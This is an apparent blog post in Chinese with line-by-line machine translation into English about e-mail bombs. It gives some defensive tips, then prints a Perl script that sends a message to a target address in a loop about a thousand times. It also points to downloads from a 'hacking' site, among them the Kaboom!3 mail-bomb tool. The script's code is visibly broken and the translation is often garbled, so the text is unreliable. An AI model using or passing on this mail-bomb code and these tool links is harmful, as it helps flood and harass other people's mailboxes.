就电子邮件炸弹,保护还是可以做得很好的。 On the e-mail bombs, protection can still do well. 因为它的复杂性不是很高,多的仅仅是垃圾邮件而已。 Because of its complexity is not very high, and more just spam it. 你可以到 You can go to
http://semxa.kstar.com/hacking/echom201.zip获得一个E-mail http://semxa.kstar.com/hacking/echom201.zip get an E-mail
Chomper(砍信机)来保护自己。 Chomper (cut letter machine) to protect themselves. 但是目前就国内用户而言,大多用户所使用的都是免费的邮箱,像yeah.net、163.net、263.net等,即便是有人炸顶多也是留在邮件服务器上了,危害基本上是没有的。 But at present the domestic users, most users are free to use the mail, like yeah.net, 163.net, 263.net, etc., even if it was fried at the most is to remain on the mail server, the damage is basically is not. 如果是用pop3接的话,可以用Outlook或Foxmail等pop的收信工具来接收的mail,大多用户使用的是windows的Outlook If you are using pop3 access, you can use Outlook or Foxmail tools such as pop's receipt of the letter to receive the mail, most users are using the Outlook windows
Express,可以在“工具à收件箱助理”中设置过滤。 Express, in the "Tools à Inbox Assistant" in the filter settings. 对于各种利用电子邮件而传播的Email蠕虫病毒和对未知的Emai蠕虫病毒你可以在http://semxa.kstar.com/hacking/KiloveU.exe获得一个由天网安全实验室开发的Email病毒免疫模块来保护。 For the spread of e-mail and Email worms and worm on the unknown Emai http://semxa.kstar.com/hacking/KiloveU.exe you can get a safety developed in the laboratory by the Skynet virus immune Email module to protect.
附:一个在UNIX下用Perl编写的邮件炸弹实例 Attached: a written in Perl under UNIX mail bomb instance
#!/bin/perl(perl所在目录) #! / Bin / perl (perl directory)
$ mailprop='/user/lib/sendmail';(sendmail所在目录) $ Mailprop = '/ user / lib / sendmail'; (sendmail directory)
$recipient='xxx@xxx.com.jp'(攻击目标) $ Recipient = 'xxx@xxx.com.jp' (target)
$variable_initialized_to_0=0;(设定变量) $ Variable_initialized_to_0 = 0; (set variables)
while ($ variable_initialized_to_0=0)<1000){ while ($ variable_initialized_to_0 = 0) <1000) {
open (MAIL,$ mailprog$ recipient”) | | die”Can't open$ mailprog! \ n open (MAIL, $ mailprog $ recipient ") | | die" Can't open $ mailprog! \ n
print MAIL” YOU Sunk!” print MAIL "YOU Sunk!"
close (MAIL); close (MAIL);
Sleep 3; Sleep 3;
$ variable_initialized_to_0+ +;(自己增) $ Variable_initialized_to_0 + +; (growing their own)
} }
上面的代码将一个变量variable_initialized_to_0初始化为0然后指定只要该变量小于1000,就将邮件发送给目标接收者。 The above code initializes a variable variable_initialized_to_0 0 then specify if the variable is less than 1000, it will send a message to the intended recipient. 程序经过while循环一次,变量variable_initialized_to_0的值加1。 Program has been a while loop, the value of the variable variable_initialized_to_0 plus 1. 邮件将被传送999次。 The message will be sent 999 times. 如果叫一个攻击者手工去输入一大群目标的话,我想攻击者应该都不会做了,但是他们往往会利用邮件列表来完成,所以当你在一些Web看到诸如“请你留您的E-mail,我们如果更新之时可以及时的通知您”的时候还是谨慎为好。 If the attacker is called a hand to enter a large group of targets, I think the attacker should not do, but they tend to use mailing lists to complete, so when you see some of the Web such as "Please leave your E -mail, if we can be updated to inform you in time "or when the care is better.
如果你仅仅是为了研究的话可以从http://semxa.kstar.com/hacking/Kaboom!3.zip获得一个最为经典的邮箱炸弹Kaboom!3。 If you have only to study, then you can get one of the most classic from http://semxa.kstar.com/hacking/Kaboom!3.zip mailbox bomb Kaboom! 3.
Tidak ada komentar:
Posting Komentar